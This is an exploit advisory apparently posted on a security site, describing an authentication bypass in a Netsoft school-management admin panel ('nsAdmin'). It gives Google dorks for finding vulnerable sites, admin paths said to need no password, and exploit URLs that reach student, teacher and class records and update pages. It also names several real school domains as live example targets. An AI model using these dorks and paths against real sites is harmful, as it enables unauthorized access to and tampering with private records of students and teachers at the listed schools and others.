WordPress Developed by Netsoft Limited Software Development Bangladesh Improper Authentication Vulnerability

2018.09.05
gb KingSkrupellos (GB) gb
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-284
CWE-287
Dork: intext:''Datacenter :: A Product of Netsoft Ltd'' - intext:''Developed by : Netsoft Limited.''

################################################################################################# # Exploit Title : WordPress Developed by Netsoft Limited Software Development BD Improper Authentication Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 05/09/2018 # Vendor Homepages : netsoft.com.bd ~ netsoft.net ~ netsoft-ltd.net ~ linkedin.com/company/net-soft-ltd # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-284 [Improper Access Control ] - CWE-287 - [ Improper Authentication ] ################################################################################################# # WordPress Datacenter Developed by Netsoft Limited Software Development Bangladesh Improper Authentication Vulnerability # Google Dorks : intext:''Datacenter :: A Product of Netsoft Ltd'' intext:''Copyright © Netsoft Ltd., all rights reserved'' intext:''Developed by : Netsoft Limited.'' # Admin Control Panel Path URL Links => /nsAdmin/index.php /nsAdmin/index.php?url=./login.php /wp-login.php It does not require any username and password. Enter this links after the Target URL. # Exploits : /nsAdmin/index.php?url=view_student.php&division=0&dis3=0 /nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0 /nsAdmin/index.php?url=class_details.php&division=0&dis3=0 /nsAdmin/index.php?url=update_teacher.php&teacher_id=4495 /nsAdmin/index.php?url=teacher_entry.php /nsAdmin/index.php?url=class_entry.php ################################################################################################# # Example Site => hmahdm.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0 => [ Proof of Concept ] => archive.is/BBwsZ mukm.edu.bd/nsAdmin/index.php?url=teacher_details.php&teacher_id=3 jpphs.edu.bd/nsAdmin/index.php?url=class_details.php&division=0&dis3=0 iahs1988.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0 mghs1992.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top